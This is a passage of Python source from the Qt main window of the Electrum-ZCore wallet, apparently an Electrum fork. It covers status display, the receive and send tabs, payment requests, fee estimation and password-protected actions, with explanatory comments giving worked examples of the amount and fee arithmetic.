self.tray.showMessage("Electrum-ZCore", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-ZCore", message, QSystemTrayIcon.Information, 20000)
# Custom wrappers for getOpenFileName and getSaveFileName that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
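# Worked example (assuming decimal_point == 8, i.e. amounts shown in BTC):
# x = 150000000 satoshis renders as roughly '1.5'; num_zeros only pads the
# fractional part with extra zeros, and decimal_point selects the unit
# (8 -> BTC, 5 -> mBTC, 2 -> bits).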
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
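# Worked example: fee_rate = 1500 sat/kB -> 1500 / 1000 = 1.5 -> '1.5 sat/byte'.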
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
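# The `follows` flags guard against feedback loops: setting one edit
# programmatically would otherwise re-trigger edit_changed on the other.
# Worked example (hypothetical rate, assuming COIN == 100_000_000): with
# rate = 20000 fiat/BTC and 100.00 typed into fiat_e, btc_e is set to
# int(100 / 20000 * COIN) = 500000 satoshis, i.e. 0.005 BTC.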
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_channels_tab(self, wallet):
#self.channels_list = ChannelsList(self)
#t = self.channels_list.get_toolbar()
#return self.create_list_tab(self.channels_list, t)
return
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', 3600)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(True)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('Request'))
self.create_invoice_button.setIcon(read_QIcon("zcore.png"))
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=230)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_requests_label = QLabel(_('Incoming payments (right-click a line for the menu)'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
self.receive_widgets = QTabWidget()
self.receive_widgets.addTab(self.receive_qr, 'QR Code')
self.receive_widgets.addTab(self.receive_address_e, 'Text')
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(self.receive_widgets)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_request(self, key):
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', 3600)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, title, content):
self.app.clipboard().setText(content)
self.show_message(_(f"{title} copied to clipboard:\n\n{content}"))
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
def update_receive_qr(self):
uri = str(self.receive_address_e.text())
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
# note: 'addr' could be ln invoice or BIP21 URI
try:
uri = util.parse_URI(addr)
except InvalidBitcoinURI:
pass
else:
addr = uri.get('address')
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_masternode_tab(self):
from .masternode_tab import MasternodeTab
self.masternode_tab = masternode_tab = MasternodeTab(self)
return masternode_tab
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(Qt.CaseInsensitive)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
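# Sketch of what fee_cb persists (assuming SimpleConfig semantics):
# dynamic fees with mempool-based estimates store the slider position
# under 'depth_level'; dynamic fees with ETA-based estimates use
# 'fee_level'; a static feerate is stored under 'fee_per_kb' in sat/kB,
# hence the /1000 when mirroring it into the sat/byte feerate_e field.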
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
self.feecontrol_fields = QWidget()
vbox_feecontrol = QVBoxLayout(self.feecontrol_fields)
vbox_feecontrol.setContentsMargins(0, 0, 0, 0)
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addWidget(self.feecontrol_fields, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.is_onchain:
return
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs = self.read_outputs()
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + '\t' + "%s"%x.get('address') + '\t'
for coin in self.pay_from:
item = QTreeWidgetItem([format(coin), self.format_amount(coin['value'])])
item.setFont(0, QFont(MONOSPACE_FONT))
self.from_list.addTopLevelItem(item)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates an unencrypted
wallet; if the user cancels the password request, the wrapped
function is not called at all. An empty input is passed as the
empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
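# Usage sketch (hypothetical method name; mirrors sign_tx below): the
# decorator injects the vetted password as a keyword argument, so call
# sites never handle it directly:
#     @protected
#     def do_sign(self, tx, password):
#         self.wallet.sign_transaction(tx, password)
#     ...
#     self.do_sign(tx)  # prompts for the password if the keystore is encrypted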
@protected
def protect(self, func, args, password):
return func(*args, password)
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
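# Worked example: with 10 sat/byte typed into feerate_e, amount becomes
# 10 * 1000 = 10000 sat/kB, and the estimator evaluates
# estimate_fee_for_feerate(10000, size) for whatever size the coin
# chooser settles on -- roughly 2250 sat for a 225-byte transaction.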
def read_outputs(self):
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
